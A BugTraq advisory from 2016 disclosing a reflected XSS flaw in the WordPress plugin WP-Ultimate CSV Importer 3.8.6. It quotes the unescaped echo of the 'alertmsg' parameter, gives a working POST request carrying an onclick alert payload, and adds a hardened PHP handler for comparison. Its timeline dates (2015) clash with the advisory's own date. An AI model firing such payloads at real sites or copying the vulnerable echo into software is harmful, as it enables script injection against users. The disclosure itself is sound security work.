BugTraq
WP-Ultimate CSV Importer XSS Vulnerability Jan 26 2016 08:49PM
Rahul Pratap Singh (techno rps gmail com)
## FULL DISCLOSURE

#Product : WP-Ultimate CSV Importer
#Exploit Author : Rahul Pratap Singh
#Version : 3.8.6
#Home page Link : https://wordpress.org/plugins/wp-ultimate-csv-importer
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016

XSS Vulnerability:

Description:
The "alertmsg" parameter is not sanitized, which leads to reflected XSS.

Vulnerable Code:
File Name: /wp-ultimate-csv-importer/index.php

Found at line 256:
echo __($_POST['alertmsg'],'wp-ultimate-csv-importer');

Exploit:
POST /wp-admin/admin-ajax.php

action=trans_alert_str&alertmsg=<input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)>

POC:
https://0x62626262.files.wordpress.com/2016/01/wp-ultimate-csv-importerxsspoc.png

Fix:
Update to 3.8.8
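
For illustration, the vulnerable pattern from index.php placed beside one hardened handler. This is an added example and not the plugin's code; the function names, the nonce action, the capability check and the message table are assumed, and the hook name follows from the action value shown in the exploit above.

```php
<?php
// Added example, not the plugin's own code.
// Hook name "wp_ajax_trans_alert_str" follows from action=trans_alert_str in
// the request above; everything else (function names, nonce action, message
// table) is assumed for illustration.

// Vulnerable pattern: untrusted POST data is used as the translation key and
// echoed raw. __() returns its input unchanged when no translation exists, so
// any markup in alertmsg is reflected into the response.
function csvi_alert_vulnerable() {
    echo __( $_POST['alertmsg'], 'wp-ultimate-csv-importer' );
    wp_die();
}

// Hardened form: only fixed, developer-written strings are translated, the
// client may only choose one by key, and the output is escaped regardless.
function csvi_alert_hardened() {
    // Reject requests that do not carry a valid nonce for this action
    // (assumed nonce action name).
    check_ajax_referer( 'csvi_alert_nonce', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) { // assumed capability
        wp_send_json_error( 'forbidden', 403 );
    }

    // Assumed message table: keys are chosen by the client, text by the plugin.
    $messages = array(
        'import_done'  => __( 'Import completed.', 'wp-ultimate-csv-importer' ),
        'file_missing' => __( 'No CSV file was uploaded.', 'wp-ultimate-csv-importer' ),
    );

    // sanitize_key() keeps only [a-z0-9_-], so the lookup key can never carry markup.
    $key = isset( $_POST['alertmsg'] )
        ? sanitize_key( wp_unslash( $_POST['alertmsg'] ) )
        : '';
    if ( ! isset( $messages[ $key ] ) ) {
        wp_send_json_error( 'unknown message key', 400 );
    }

    // esc_html() escapes <, >, &, " and ' so the reply is inert even if a
    // table entry were ever edited to contain markup.
    echo esc_html( $messages[ $key ] );
    wp_die();
}

add_action( 'wp_ajax_trans_alert_str', 'csvi_alert_hardened' );
```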

Vulnerability Disclosure Timeline:
- January 14, 2015 - Bug discovered, initial report to Vendor
- January 14, 2015 - Vendor acknowledged and scheduled a fix
- January 18, 2015 - Reported to WordPress
- January 19, 2015 - WordPress response, plugin taken down
- January 26, 2015 - Vendor deployed a patch

#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################

Pub Ref:
https://0x62626262.wordpress.com/2016/01/26/wp-ultimate-csv-importer-xss-vulnerability/
https://wordpress.org/plugins/wp-ultimate-csv-importer/changelog/

[+] Disclaimer:
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
